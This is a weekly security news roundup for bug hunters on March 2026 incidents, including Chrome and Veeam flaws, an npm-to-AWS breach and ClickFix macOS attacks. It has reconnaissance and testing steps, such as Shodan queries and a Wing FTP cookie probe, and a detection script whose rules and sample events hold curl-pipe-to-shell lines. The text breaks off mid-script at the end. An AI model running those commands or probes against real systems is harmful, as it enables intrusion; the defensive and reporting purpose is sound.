Security Roundup March 9–16, 2026: Chrome Zero-Days, Veeam Mass RCE & Supply Chain AWS Breach

Published: March 16, 2026  |  Reading time: 15 minutes  |  🚨 WEEKLY ROUNDUP

📢 Affiliate Disclosure: This site contains affiliate links to Amazon. We earn a commission when you purchase through our links at no additional cost to you.

This week the browser you're reading this on had two actively exploited zero-days fixed mid-week, a backup platform deployed on millions of enterprise servers shipped seven critical RCE patches in a single advisory, and a supply chain attack from eight months ago quietly turned into a full AWS environment wipe in under 72 hours.

Google rushed out emergency Chrome patches for CVE-2026-3909 and CVE-2026-3910 — an out-of-bounds write in the Skia graphics engine and a logic flaw in the V8 JavaScript engine — both confirmed exploited in the wild before the patch. Veeam followed with the most concentrated single advisory in its history: seven critical-severity CVEs, five of them at CVSS 9.9, with some requiring only authenticated domain access to execute code remotely on backup infrastructure. And Google's Cloud Threat Horizons Report lifted the curtain on how UNC6426 turned a poisoned npm package from August 2025 into full AWS administrator access, data destruction, and public GitHub exposure of every internal repo — all in three days.

Meanwhile, a court-authorised international takedown shut down the SocksEscort residential proxy botnet — but a second router botnet named KadNap immediately stepped in to fill the gap. ClickFix crossed the OS boundary to target macOS users with a new infostealer called MacSync. And CISA added Wing FTP Server to the KEV catalogue just as researchers published proof-of-concept chains combining its information disclosure flaw with a critical RCE bug patched last May.

Six findings plus a bonus — here's everything that mattered this week for bug hunters and security professionals.

1. 🔴 CVE-2026-3909 & CVE-2026-3910: Chrome 0-Days Actively Exploited

Severity: High  |  Status: Both actively exploited in the wild  |  Fixed in: Chrome 146.0.7680.75/76 (Windows/macOS), 146.0.7680.75 (Linux)

What Happened

Google issued an emergency update for Chrome on March 11 to patch two high-severity vulnerabilities that it confirmed have active in-the-wild exploits. The week's most urgent patch covers:

  • CVE-2026-3909 — Out-of-bounds write in the Skia 2D graphics rendering library. Skia processes all visual rendering in Chrome — images, SVGs, CSS gradients, canvas operations. An OOB write in Skia is typically exploitable to achieve code execution within the renderer sandbox, serving as the first stage in a browser exploit chain.
  • CVE-2026-3910 — Inappropriate implementation in V8, Chrome's JavaScript and WebAssembly engine. V8 misimplementation bugs frequently result in out-of-bounds memory access or type confusion, enabling attackers to escape the renderer process or corrupt memory in ways that lead to code execution.

A third flaw, CVE-2026-3913, was patched in the same release — a different Skia issue, though this one was not marked as actively exploited at time of publication.

Google declined to share technical details or attribution for CVE-2026-3909 and CVE-2026-3910, which is standard practice while the majority of users are still patching. Both flaws are confirmed exploited in the wild, meaning a working exploit was in circulation before most users had updated.

Why It Matters for Bug Hunters

Chrome zero-days are among the highest-value findings in the security research community — and among the most carefully defended targets. Google's Project Zero team, the Chrome Vulnerability Rewards Programme, and a large external research community make Chrome one of the most hardened applications in existence. When two zero-days land in the same emergency patch, it's notable.

For bug hunters, the Skia and V8 attack surfaces are both deep and heavily researched:

  • Skia is not just Chrome — it's also used in Android, Flutter, and Google products. Finding a class-similar bug in Skia affects a much broader attack surface than just the browser. Google's Vulnerability Reward Programme covers Skia bugs in Chrome and Android separately, and Android Skia bugs can command higher payouts due to broader impact.
  • V8 bugs are perennially valuable — V8 is also the JavaScript engine powering Node.js, Electron apps, and Cloudflare Workers. A V8 bug in Chrome may have sibling impact across the Node.js and server-side JavaScript ecosystem. Past V8 disclosures have paid $15,000–$30,000 in Chrome VRP, with additional rewards for Electron or Node.js impact.

The most accessible entry point for Chrome security research is fuzzing. Google itself runs ClusterFuzz continuously against Chrome and publishes the ClusterFuzz framework as open source. Running targeted fuzzers against Skia (especially SVG and canvas paths) or V8 (particularly Wasm GC and JIT paths) remains a viable strategy for independent researchers, and the barrier is lower than it appears.

💡 Action Required: If you or your organisation haven't yet updated Chrome to 146.0.7680.75 or later, do it now. Both vulnerabilities have active exploits. Check your version at chrome://settings/help.

Source: The Hacker News — Google Fixes Two Chrome Zero-Days, March 11, 2026

2. 🔴 Veeam Backup & Replication: 7 Critical CVEs, Five Rated CVSS 9.9

Severity: Critical — five CVEs at CVSS 9.9, two at 8.8–9.1  |  Product: Veeam Backup & Replication v12.x and v13.x  |  Risk: Active ransomware exploitation expected

What Happened

Veeam released emergency security updates this week covering seven critical vulnerabilities across Veeam Backup & Replication — the most concentrated single advisory in the product's history. The full list:

  • CVE-2026-21666 (CVSS 9.9) — Authenticated domain user → RCE on Backup Server
  • CVE-2026-21667 (CVSS 9.9) — Authenticated domain user → RCE on Backup Server (separate code path)
  • CVE-2026-21668 (CVSS 8.8) — Authenticated domain user → arbitrary file manipulation on Backup Repository
  • CVE-2026-21672 (CVSS 8.8) — Local privilege escalation on Windows-based Veeam servers
  • CVE-2026-21708 (CVSS 9.9) — Backup Viewer role → RCE as the PostgreSQL process user
  • CVE-2026-21669 (CVSS 9.9) — Authenticated domain user → RCE on Backup Server (fixed in v13 only)
  • CVE-2026-21671 (CVSS 9.1) — Backup Administrator → RCE in high-availability Veeam deployments

The first five affect Veeam Backup & Replication 12.3.2.4165 and all earlier version 12 builds, patched in version 12.3.2.4465. The remaining two affect the version 13 branch and are fixed in version 13.0.1.2067. Veeam explicitly warned: "Once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments."

This warning deserves emphasis. Veeam has the worst track record of any enterprise backup vendor for post-disclosure exploitation timelines. CVE-2023-27532, CVE-2024-40711, and CVE-2025-23120 were all weaponised by ransomware groups within days to weeks of patch disclosure. The pattern is consistent: attackers diff the patch, build an exploit, and scan for vulnerable instances before the majority of organisations have patched.

Why It Matters for Bug Hunters

Backup infrastructure is one of the most critical attack targets in enterprise environments. Compromising a backup server gives an attacker access to backup data (which contains copies of everything), the ability to destroy backups (making ransomware recovery impossible), and often privileged credentials for the rest of the infrastructure.

The attack paths here are notable:

  • CVE-2026-21708 requires only Backup Viewer role — the most basic read-only access level in Veeam. This is a particularly dangerous escalation path: a low-privilege service account for backup verification can translate to code execution as the database process user.
  • The "authenticated domain user" requirement for CVEs 21666/21667/21669 sounds restrictive but isn't in practice — most organisations have broad Active Directory access, and a single compromised domain account (via phishing, credential stuffing, or infostealer logs) is sufficient.
  • CVE-2026-21671 targeting HA deployments is particularly interesting — organisations that deployed HA for resilience have a higher-severity exposure than single-server installs.

For bug bounty researchers, Veeam has a well-established vulnerability disclosure programme. RCE findings in Veeam Backup products consistently result in paid disclosures. Given the complexity of the codebase and Veeam's history, there are almost certainly additional undiscovered vulnerabilities in adjacent code paths to the ones patched this week.

How to Test

  • Veeam Backup Server typically listens on TCP 9392 (REST API) and 9401/9395. The management console is accessible via HTTPS on these ports.
  • Enumerate endpoints at /api/v1/ — Veeam's REST API has had authentication issues in multiple previous versions. Test with minimal credentials for privilege escalation paths.
  • The PostgreSQL angle (CVE-2026-21708) suggests the backup viewer role has excessive database access. Look for other roles that interact with the Postgres backend unexpectedly.
  • For CVE-2026-21672 (LPE): Veeam services run as SYSTEM on Windows. Test for writable directories in the Veeam install path, DLL search order hijacking in service processes, and named pipe impersonation — all common LPE vectors in Windows services.
  • Check whether your target exposes Veeam on internet-facing IPs via Shodan: product:"Veeam" or port-based fingerprinting on 9392.

⚠️ Ransomware Risk: Based on Veeam's history, weaponised exploits for these CVEs will likely appear within days to weeks. If you run Veeam Backup & Replication, patching to v12.3.2.4465 or v13.0.1.2067 is urgent.
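A branch-aware patch status check that encodes the fixed builds named in this Veeam item and in the Chrome item above, added here as an example (not Veeam or Google tooling). The point it demonstrates is that a host's required fix depends on which major branch it runs, so a single "minimum version" would misjudge v13 installs. The host names and installed versions are constructed.

```python
"""Branch-aware patch status check encoding the fixed builds named in the
Veeam item above and the Chrome item before it.  Added example, not Veeam or
Google tooling; the host names and installed versions are constructed."""

# Fixed builds as stated in the advisories.  The required fix depends on the
# major branch a host runs, so a single "minimum version" would misjudge v13.
FIXED_BUILDS = {
    "Veeam Backup & Replication": {12: "12.3.2.4465", 13: "13.0.1.2067"},
    "Google Chrome": {146: "146.0.7680.75"},
}


def parse_version(version):
    """Turn '12.3.2.4165' into (12, 3, 2, 4165).  Numeric comparison matters:
    as strings, '12.3.2.999' would sort above '12.3.2.4465'."""
    parts = version.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version string: {version!r}")
    return tuple(int(p) for p in parts)


def patch_status(product, installed):
    """Return 'patched', 'vulnerable' or 'unknown-branch' for one host."""
    branches = FIXED_BUILDS.get(product)
    if branches is None:
        raise KeyError(f"no fixed builds recorded for {product!r}")
    installed_v = parse_version(installed)
    fixed = branches.get(installed_v[0])
    if fixed is None:
        # A branch the advisory does not mention (e.g. an end-of-life major)
        # needs a human decision rather than a silent "patched".
        return "unknown-branch"
    fixed_v = parse_version(fixed)
    # Right-pad with zeros so a 3-part string compares sanely with a 4-part build.
    width = max(len(installed_v), len(fixed_v))
    installed_v += (0,) * (width - len(installed_v))
    fixed_v += (0,) * (width - len(fixed_v))
    return "patched" if installed_v >= fixed_v else "vulnerable"


def audit(inventory):
    """Group hosts by status.  inventory rows are (host, product, version)."""
    report = {"patched": [], "vulnerable": [], "unknown-branch": []}
    for host, product, version in inventory:
        report[patch_status(product, version)].append(host)
    return report


# Constructed inventory; hosts are hypothetical.
SAMPLE_INVENTORY = [
    ("bkp-01", "Veeam Backup & Replication", "12.3.2.4165"),  # highest affected v12 build
    ("bkp-02", "Veeam Backup & Replication", "12.3.2.4465"),  # fixed v12 build
    ("bkp-03", "Veeam Backup & Replication", "13.0.1.1032"),  # v13 below the fix (constructed)
    ("bkp-04", "Veeam Backup & Replication", "11.0.1.1000"),  # branch not in the advisory
    ("ws-101", "Google Chrome", "146.0.7680.60"),
    ("ws-102", "Google Chrome", "146.0.7680.76"),
]

if __name__ == "__main__":
    for status, hosts in audit(SAMPLE_INVENTORY).items():
        print(f"{status:14s} {', '.join(hosts) or '-'}")
```

Feed it your real inventory (software-asset export, RMM query, Chrome enterprise reporting) in place of SAMPLE_INVENTORY; the "unknown-branch" bucket is deliberately not folded into "patched" so that unsupported majors surface for review.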

Source: The Hacker News — Veeam Patches 7 Critical Backup & Replication Flaws, March 12, 2026

3. 🔴 UNC6426: Stale Supply Chain Keys → Full AWS Admin Access in 72 Hours

Attack type: Supply chain → CI/CD token theft → OIDC abuse → AWS privilege escalation  |  Initial vector: nx npm package supply chain compromise (August 2025)  |  Outcome: Full data exfiltration, production EC2/RDS destruction, all repos made public

What Happened

Google's Cloud Threat Horizons Report for H1 2026 revealed the full attack chain behind one of the most technically sophisticated cloud breaches of the year so far — and the initial entry point was a poisoned npm package from eight months earlier.

Here's the complete attack timeline:

  1. August 2025 — Supply chain compromise: Unknown threat actors exploited a vulnerable pull_request_target GitHub Actions workflow in the nx npm package (the popular Nrwl/Nx monorepo tooling framework). This "Pwn Request" attack allowed them to push trojanised versions of nx to the npm registry, embedding a postinstall script that dropped a JavaScript credential stealer named QUIETVAULT.
  2. QUIETVAULT used a legitimate LLM coding tool already installed on victim machines to scan the local filesystem for sensitive data — environment variables, GitHub Personal Access Tokens (PATs), AWS credentials, and API keys — then uploaded everything to a public GitHub repository.
  3. March 2026 — Delayed exploitation: UNC6426 obtained a stolen GitHub PAT harvested months earlier when a developer at the victim organisation triggered an Nx Console extension update that pulled the malicious package. Using Nord Stream (an open-source CI/CD secret extraction tool), UNC6426 pivoted from the GitHub PAT to a service account with broader permissions.
  4. OIDC abuse: The service account had permission to trigger GitHub Actions workflows. UNC6426 used the --aws-role parameter in Nord Stream to generate temporary AWS STS tokens through the GitHub-to-AWS OpenID Connect trust relationship — a legitimate integration mechanism that was dramatically over-permissioned.
  5. Full admin escalation: The compromised Actions-CloudFormation role had CAPABILITY_NAMED_IAM permissions. UNC6426 deployed a new CloudFormation stack whose sole purpose was to create a new IAM role and attach arn:aws:iam::aws:policy/AdministratorAccess — achieving full AWS administrator access in under 72 hours from initial pivot.
  6. Destruction and exfiltration: The attacker enumerated and exfiltrated S3 buckets, terminated production EC2 and RDS instances, decrypted application keys, renamed all internal GitHub repositories to /s1ngularity-repository-[random], and made them public.

Why It Matters for Bug Hunters

This attack chain is a masterclass in how supply chain compromises generate long-tail risk. The initial infection happened in August 2025. Exploitation happened in March 2026. Seven months passed between a developer pulling a malicious package and an attacker using the harvested tokens to destroy a production environment.

Several vulnerability classes converge in this story — each individually worth pursuing in bug bounty programmes:

  • Pwn Request / pull_request_target misuse: This GitHub Actions misconfiguration is widespread. The pull_request_target trigger runs with write permissions to the target repository and can access secrets — yet it's frequently misconfigured to execute code from PRs by untrusted contributors. Hunt for this pattern in public repos belonging to large organisations with bug bounty programmes. GitHub Security Lab's research provides a solid methodology.
  • OIDC trust misconfiguration: GitHub-to-AWS OIDC trust relationships are increasingly common but frequently over-permissioned. If an IAM role trusts any branch or any repo in an organisation, a compromised GitHub account can obtain cloud credentials. Testing OIDC trust scope (which repos, which branches, which Actions) is a valid cloud security bug class on many programmes.
  • CloudFormation privilege escalation: The CAPABILITY_NAMED_IAM permission is a well-documented escalation path. If an IAM role can deploy CloudFormation stacks with IAM capabilities, it can create a new privileged role — regardless of its own permission set. This is a known AWS privilege escalation technique covered in Rhino Security Labs' AWS privilege escalation research.

💡 Audit Checklist: Review your GitHub Actions workflows for pull_request_target triggers. Audit your OIDC trust policies — ensure they scope to specific repos and branches, not wildcards. Audit which IAM roles have CAPABILITY_NAMED_IAM and iam:CreateRole permissions. These three checks will find real issues in most organisations.
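The OIDC and IAM checks from that list, as an added example that is not from Google's report or any AWS tool: a Python audit that flags a GitHub-to-AWS trust policy whose sub condition is missing or wildcarded, or whose aud is not pinned to STS, and that lists the IAM actions in a permission policy which would let a CloudFormation-deploying role create a more privileged role for itself. Both trust policies, the permission policy and the account id 111122223333 are constructed placeholders.

```python
"""Audit of GitHub-to-AWS OIDC trust policies and of the IAM actions that
enable the CloudFormation role-creation escalation.  Added example, not a
Google or AWS tool; both policies are constructed and 111122223333 is a
placeholder account id."""
import json
import re

GITHUB_OIDC = "token.actions.githubusercontent.com"
SUB_KEY = f"{GITHUB_OIDC}:sub"
AUD_KEY = f"{GITHUB_OIDC}:aud"

# A well-scoped subject pins owner, repo and one branch, tag or environment.
# A wildcard in owner/repo lets any workflow in the organisation assume the
# role; a wildcard ref (or a pull_request subject) lets PR-triggered
# workflows do so, which is the "Pwn Request" path.
STRICT_SUB = re.compile(
    r"^repo:[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+:"
    r"(ref:refs/(heads|tags)/[^*?]+|environment:[^*?]+)$"
)

# Actions that let a principal create a more privileged role for itself; a
# role that deploys CloudFormation stacks containing IAM resources (the
# CAPABILITY_NAMED_IAM acknowledgement) needs them.
ESCALATION_ACTIONS = {"iam:CreateRole", "iam:AttachRolePolicy", "iam:PutRolePolicy", "iam:PassRole"}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def audit_trust_policy(policy):
    """Return findings for every GitHub OIDC statement; [] means none found."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        principal = stmt.get("Principal", {})
        federated = _as_list(principal.get("Federated", [])) if isinstance(principal, dict) else []
        if stmt.get("Effect") != "Allow" or not any(GITHUB_OIDC in p for p in federated):
            continue  # not a GitHub OIDC allow statement
        cond = stmt.get("Condition", {})
        subs = {op: _as_list(v[SUB_KEY]) for op, v in cond.items() if SUB_KEY in v}
        auds = [a for v in cond.values() for a in _as_list(v.get(AUD_KEY, []))]
        if not auds:
            findings.append("no aud condition: tokens minted for any audience are accepted")
        elif auds != ["sts.amazonaws.com"]:
            findings.append(f"unexpected aud value(s): {auds}")
        if not subs:
            findings.append("no sub condition: any GitHub repository can assume this role")
        for op, values in subs.items():
            for sub in values:
                # StringLike without a wildcard behaves like StringEquals; any
                # other operator (StringNotEquals, ...) is not a scope restriction.
                if op in ("StringEquals", "StringLike") and STRICT_SUB.match(sub):
                    continue
                findings.append(f"over-broad sub ({op}): {sub!r}")
    return findings


def _action_matches(pattern, action):
    # IAM action patterns: '*' matches any run of characters, case-insensitively.
    return re.fullmatch(re.escape(pattern).replace(r"\*", ".*"), action, re.IGNORECASE) is not None


def escalation_risk(permission_policy):
    """Return the escalation-relevant actions an identity policy grants."""
    granted = set()
    for stmt in _as_list(permission_policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            granted.update(a for a in ESCALATION_ACTIONS if _action_matches(pattern, a))
    return granted


# Constructed trust policies: the weak one trusts every repo in the org and
# never checks the audience; the hardened one pins aud, repo and branch.
WEAK_TRUST_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [{
  "Effect": "Allow",
  "Principal": {"Federated": "arn:aws:iam::111122223333:oidc-provider/token.actions.githubusercontent.com"},
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {"StringLike": {"token.actions.githubusercontent.com:sub": "repo:example-org/*"}}}]}""")

HARDENED_TRUST_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [{
  "Effect": "Allow",
  "Principal": {"Federated": "arn:aws:iam::111122223333:oidc-provider/token.actions.githubusercontent.com"},
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {"StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
    "token.actions.githubusercontent.com:sub": "repo:example-org/deploy:ref:refs/heads/main"}}}]}""")

# Constructed permission policy of the kind a CI deploy role might carry:
# iam:* is what turns a stack deploy into full administrator access.
CFN_DEPLOY_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["cloudformation:*", "iam:*"], "Resource": "*"}]}

if __name__ == "__main__":
    for name, pol in (("weak", WEAK_TRUST_POLICY), ("hardened", HARDENED_TRUST_POLICY)):
        print(name, audit_trust_policy(pol) or ["OK"])
    print("escalation-capable actions:", sorted(escalation_risk(CFN_DEPLOY_POLICY)))
```

Run audit_trust_policy over the AssumeRolePolicyDocument of every role in the account and escalation_risk over the policies attached to any role a CI system can assume; a role that appears in both result sets (assumable from a broad GitHub scope and able to create or attach role policies) is the combination this attack chain exploited.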

Source: The Hacker News — UNC6426 Exploits nx npm Supply Chain Attack, March 12, 2026

4. 🟠 SocksEscort Dismantled, KadNap Moves In: The Endless Router Botnet Cycle

Operation 1: SocksEscort proxy service dismantled by international law enforcement  |  Operation 2: KadNap botnet (14,000+ routers) fuelling "Doppelganger" proxy — currently active

What Happened

Two related stories this week paint a complete picture of the residential proxy botnet ecosystem.

SocksEscort takedown: A court-authorised international law enforcement operation dismantled the SocksEscort criminal proxy service — a residential proxy network that had enslaved thousands of home routers into a botnet that sold anonymised internet traffic to cybercriminals for large-scale fraud. SocksEscort was powered by AVrecon, malware written in C for MIPS and ARM architectures that exploited known security flaws in SOHO (small office/home office) routers. The malware's persistence mechanism was particularly nasty: it flashed custom firmware to infected devices that deliberately disabled future OEM updates, permanently converting routers into proxy nodes that would survive both reboots and vendor patches.

KadNap fills the gap: Almost simultaneously with the SocksEscort takedown, researchers detailed an active router botnet named KadNap comprising more than 14,000 compromised network devices — primarily Asus routers — that fuel an illegal proxy service called Doppelganger. Unlike SocksEscort's centralised infrastructure (making it takedown-vulnerable), KadNap uses a peer-to-peer network based on the Kademlia distributed hash table protocol for decentralised command-and-control. This design makes it significantly more resilient to law enforcement operations. Infected devices tunnel customers' internet traffic through residential IP addresses, offering threat actors cover for fraudulent and malicious activity.

Why It Matters for Bug Hunters

Router botnets are a perennial problem with deep implications for security researchers:

For vulnerability researchers: AVrecon and KadNap both exploit "known security flaws" in SOHO routers — CVEs that exist, have patches available, but are almost never applied by residential users. This means the vulnerability research pipeline is healthy, but the patch-application pipeline is broken. If you discover a new vulnerability in a popular consumer router (Asus, TP-Link, Netgear, D-Link), the attack surface is enormous — millions of unpatched devices persist for years.

For cloud/enterprise bug hunters: Residential proxy services like SocksEscort and Doppelganger are the mechanism behind much of the credential stuffing, account takeover, and fraud activity that web applications face. Understanding how these services work helps you design better fraud detection — and helps you understand why IP-based blocking is insufficient as a primary security control.

For IoT/embedded security researchers: The AVrecon firmware-flashing persistence technique is notable. Malware that defeats OEM updates by flashing custom firmware represents a new persistence class for embedded devices. Testing whether your target device has signed firmware verification, secure boot, or integrity checking is a valuable research direction — and many consumer devices fail this test.

How to Test Router Security

  • Check for exposed router admin interfaces: Shodan searches for common router admin pages (title:"ASUS Router", title:"TP-LINK") find millions of exposed devices
  • Test for authentication bypass in the router's web management interface — many SOHO routers have had auth bypass bugs in their CGI-based admin panels
  • Review UPnP exposure: many routers auto-forward ports via UPnP without authentication, enabling direct access to internal services
  • Test for command injection in the diagnostic tools (ping, traceroute, nslookup) that most router admin interfaces expose — this class of bug is endemic in SOHO firmware
  • Verify firmware update integrity: does the router validate firmware signatures before flashing? Testing this on lab hardware reveals whether the device is vulnerable to the AVrecon persistence technique

Sources: The Hacker News — Authorities Disrupt SocksEscort | The Hacker News — KadNap Malware Infects 14,000 Edge Devices

5. 🟠 ClickFix Goes Cross-Platform: MacSync Infostealer Hits macOS via Three Campaigns

Threat: ClickFix social engineering now delivering macOS-specific infostealer  |  Lure types: Fake AI tool installers, fake CAPTCHA, fake browser extensions  |  Malware: MacSync infostealer

What Happened

Sophos researchers published an analysis of three ClickFix campaigns delivering a new macOS infostealer named MacSync — marking ClickFix's clear expansion beyond its Windows PowerShell origins into macOS terminal command injection. The technique is conceptually identical but adapted for the macOS environment: instead of convincing users to paste malicious commands into a Windows Run dialog, the campaigns direct macOS users to open Terminal and paste malicious shell commands.

The three campaigns documented by Sophos:

  1. November 2025 — OpenAI Atlas browser lure: Fake sponsored search results on Google directed users to a fake Google Sites page offering an "OpenAI Atlas browser" download. Instead of a download, the page displayed a fake error with Terminal commands to "fix" the installation. The commands installed MacSync.
  2. January 2026 — Fake CAPTCHA lure: A campaign using fake CAPTCHA verification pages that asked users to "verify they are human" by opening Terminal and pasting a provided command. The CAPTCHA aesthetic was designed to match familiar verification flows, reducing suspicion.
  3. February 2026 — Fake browser extension lure: A campaign impersonating a popular browser extension installer, again using the Terminal command injection pattern to deliver MacSync.

MacSync exfiltrates browser cookies, saved passwords, autofill data, cryptocurrency wallet files, and document files matching high-value extensions. The Jamf Threat Labs team had flagged earlier ClickFix-to-macOS campaigns in December 2025, but Sophos' research provides the most complete picture of how the technique has matured.

Why It Matters for Bug Hunters

ClickFix is doing something strategically significant: it's routing around technical exploitation entirely. There's no CVE needed. No browser vulnerability, no macOS sandbox escape. The "vulnerability" is the user's reasonable assumption that copying instructions from an apparently legitimate page is safe.

Several implications for security professionals:

  • macOS users are not safer by default: The security research community skews heavily macOS. If you're reading this, you're probably at higher risk from MacSync campaigns than the average user — because these campaigns specifically target developers and technical users who are comfortable with Terminal.
  • Platform-specific detection gaps: macOS EDR coverage is weaker than Windows. Many organisations deploy Windows-focused endpoint detection and have lighter (or no) coverage on macOS machines. If you're doing detection engineering, test whether your macOS endpoint monitoring catches shell commands pasted directly into Terminal by a user (vs. executed from a script).
  • The "legitimate tool" lure evolves: The fake AI tool installer pattern is expanding. Claude Code, OpenAI tools, Nx (from the supply chain story), and now "OpenAI Atlas" have all been used as lures. If you use AI developer tooling, verify every installation source against official documentation.
  • Affiliate and advertising platform abuse: The first campaign used Google's sponsored search results. This is a detection and prevention gap worth investigating — advertising platforms that allow impersonation of technology products are an ongoing vector. Google, Meta, and Microsoft all have bug bounty / policy violation reporting mechanisms for ad abuse.

⚠️ macOS OpSec: Be sceptical of any web page asking you to open Terminal and paste a command. Legitimate software installers use .dmg or .pkg files, not Terminal commands pasted from a webpage. Enable macOS Gatekeeper and XProtect, and consider deploying an EDR solution if you're doing security research on macOS.
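For the detection-engineering question raised above (does your macOS telemetry catch a command pasted into Terminal rather than run from a script?), here is an added example that is not Sophos or Jamf code: rules for the fetch-and-pipe-to-shell delivery pattern ClickFix relies on, run over constructed process-execution events, with each hit labelled interactive (spawned by a terminal emulator) or scripted. The event line format, host names and example.invalid URLs are invented and carry no real MacSync indicator.

```python
"""Detection for ClickFix-style "paste this into Terminal" execution on macOS,
run over constructed process-execution events.  Added example, not Sophos or
Jamf code; the event format, hosts and example.invalid URLs are invented and
carry no real MacSync indicator."""
import re
from dataclasses import dataclass

TERMINAL_EMULATORS = {"Terminal", "iTerm2", "Warp", "Alacritty"}
SHELLS = {"sh", "bash", "zsh"}

# Rules describe the delivery pattern (remote or encoded content handed
# straight to an interpreter), not any particular payload.
RULES = {
    "download-piped-to-shell":
        re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64-decoded-to-shell":
        re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "osascript-shell-script":
        re.compile(r"\bosascript\b.*do shell script"),
}

# Constructed event line: ISO timestamp, host, parent process, process, quoted command line.
LINE = re.compile(r'^(\S+) host=(\S+) parent=(\S+) proc=(\S+) cmd="(.*)"$')


@dataclass
class Alert:
    ts: str
    host: str
    rule: str
    origin: str   # "interactive": spawned by a terminal emulator; else "scripted"
    cmd: str


def detect(events):
    """Return one Alert per shell event whose command line matches a rule."""
    alerts = []
    for line in events:
        m = LINE.match(line)
        if not m:
            continue  # malformed telemetry is skipped rather than trusted
        ts, host, parent, proc, cmd = m.groups()
        if proc not in SHELLS:
            continue
        for name, rx in RULES.items():
            if rx.search(cmd):
                origin = "interactive" if parent in TERMINAL_EMULATORS else "scripted"
                alerts.append(Alert(ts, host, name, origin, cmd))
                break  # first matching rule wins; one alert per event
    return alerts


def interactive_hits(events):
    """The subset that answers the question above: pasted-into-Terminal cases."""
    return [a for a in detect(events) if a.origin == "interactive"]


# Constructed telemetry.  Lines 1, 2 and 5 should alert; 3, 4 and 6 are benign.
SAMPLE_EVENTS = [
    '2026-03-14T10:02:11Z host=mbp-07 parent=Terminal proc=zsh cmd="curl -fsSL https://example.invalid/atlas-fix.sh | bash"',
    '2026-03-14T10:03:40Z host=mbp-07 parent=Terminal proc=zsh cmd="echo aGVsbG8= | base64 -d | sh"',
    '2026-03-14T10:05:00Z host=mbp-07 parent=launchd proc=bash cmd="/usr/local/bin/backup.sh --nightly"',
    '2026-03-14T10:06:12Z host=mbp-09 parent=Terminal proc=zsh cmd="brew install wget"',
    '2026-03-14T10:07:30Z host=ci-mac-2 parent=cron proc=sh cmd="curl -s https://example.invalid/agent | sh"',
    '2026-03-14T10:08:05Z host=mbp-09 parent=Terminal proc=zsh cmd="curl -I https://example.com"',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.ts} {a.host:9s} {a.origin:11s} {a.rule}: {a.cmd}")
```

The origin label is the useful part for the test the article suggests: replay a harmless fetch-and-pipe command from Terminal on a lab Mac and confirm your EDR emits an event whose parent is the terminal emulator; if only the scripted cases appear in your telemetry, the interactive path is a blind spot.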

Source: The Hacker News — ClickFix Campaigns Spread MacSync macOS Infostealer, March 16, 2026

6. 🟠 CVE-2025-47813: Wing FTP Server Joins CISA KEV — RCE Chain Goes Public

CVE: CVE-2025-47813 (information disclosure, now KEV) chains with CVE-2025-47812 (critical RCE)  |  Affected: Wing FTP Server < v7.4.4  |  Customers: 10,000+ including US Air Force, Sony, Airbus

What Happened

CISA added CVE-2025-47813 to its Known Exploited Vulnerabilities catalogue on March 16, giving Federal Civilian Executive Branch agencies two weeks to patch. The flaw is a path disclosure vulnerability in Wing FTP Server — when a long value is sent in the UID cookie, the server returns an error message revealing the full local installation path.

Individually, a path disclosure sounds low severity. The problem is the chain: security researcher Julien Ahrens discovered and reported three Wing FTP Server vulnerabilities simultaneously:

  • CVE-2025-47813 — Information disclosure (installation path via UID cookie error)
  • CVE-2025-47812 — Critical RCE (previously confirmed exploited in the wild; one day after PoC publication, active exploitation began)
  • CVE-2025-27889 — Password theft via information disclosure

The path disclosure in CVE-2025-47813 is being exploited as part of the same chain as the RCE in CVE-2025-47812. Ahrens published proof-of-concept code for CVE-2025-47813 in June 2025, explicitly noting the chain potential. Now, eight months later, CISA is confirming it's being actively used.

Wing FTP Server's customer base — US Air Force, Sony, Airbus, Reuters, Sephora — makes this a high-impact KEV addition despite the relatively lower profile of the product compared to enterprise platforms.

Why It Matters for Bug Hunters

The Wing FTP Server story is a case study in vulnerability chaining — individually low-severity findings combined into critical exploitation paths:

  • Error messages as intelligence: The UID cookie disclosure reveals the installation path — which tells an attacker the exact file system layout, whether the server runs as a standard or custom install, and enables path-dependent exploit payloads. Information disclosure bugs are frequently dismissed as low severity and left unpatched, creating exactly these chain opportunities.
  • File transfer software as attack surface: FTP/SFTP servers often run with elevated privileges (to bind low ports and access files across the filesystem), are frequently internet-exposed, and are often undermanaged. Wing FTP Server, Serv-U, FileZilla Server, and similar products are worth including in your target portfolio — they have rich vulnerability histories and are under-researched compared to web applications.
  • The disclosure-to-exploitation gap: PoC published June 2025, first exploitation observed shortly after, CISA KEV added March 2026. Almost nine months of active exploitation before a federal mandate to patch. This gap is representative — expect similar windows for Veeam this week.

How to Test

  • Wing FTP Server exposes a web-based admin interface (typically port 5466) and a client-facing HTTPS interface (port 443 or 8443)
  • Test the UID cookie disclosure: send a request with an oversized UID cookie value and examine the error response for file system path information
  • Shodan fingerprinting: search for Wing FTP Server login pages to find exposed instances
  • For the RCE chain: once the path is disclosed, CVE-2025-47812 requires constructing a payload that exploits the specific RCE vector using the resolved path — refer to Ahrens' published advisory for details
  • Check for CVE-2025-27889 independently: the password theft disclosure may work without needing the full RCE chain and is useful for credential harvest even if the RCE is patched
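The defender's side of the UID cookie test above, as an added example that is not Wing FTP or CISA tooling: a scan of HTTP request/response records that flags an oversized UID cookie value and an error body that leaks an installation path. The records, the ExampleFTP path and the 64-character threshold are constructed; tune the threshold against your own baseline of legitimate UID values.

```python
"""Log-side detection for the oversized UID cookie probe described above.
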